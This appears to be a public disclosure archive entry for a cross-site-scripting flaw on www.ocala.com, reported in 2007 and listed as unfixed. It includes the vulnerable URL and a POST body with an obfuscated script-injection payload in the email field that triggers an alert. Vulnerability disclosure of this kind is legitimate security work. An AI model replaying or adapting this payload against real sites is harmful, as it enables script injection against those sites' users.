Security researcher DerickTham, has submitted on 26/12/2007 a cross-site-scripting (XSS) vulnerability affecting www.ocala.com, which at the time of submission ranked 108368 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/02/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 26/12/2007 |
Date published: 25/02/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: DerickTham |
Domain: www.ocala.com |
Category: XSS |
Pagerank: 108368 |
URL: http://www.ocala.com/apps/pbcs.dll/reguser?Category=&All=1 |
POST: Login=1&RedirectURL=http%3A%2F%2Fwww.ocala.com%2Fapps%2Fpbcs.dll%2Ffrontpage%3F%26forceuserreg%3D1%2 6login%3D1+%0D%0A%0D%0A&cookiename=usernamepassword&email=>"><ScRiPt%20%0a%0d>alert(/=XSSByDT=/)%3B< /ScRiPt>&pwd=123&Login=Login |
Click here to view the mirror
|
|
|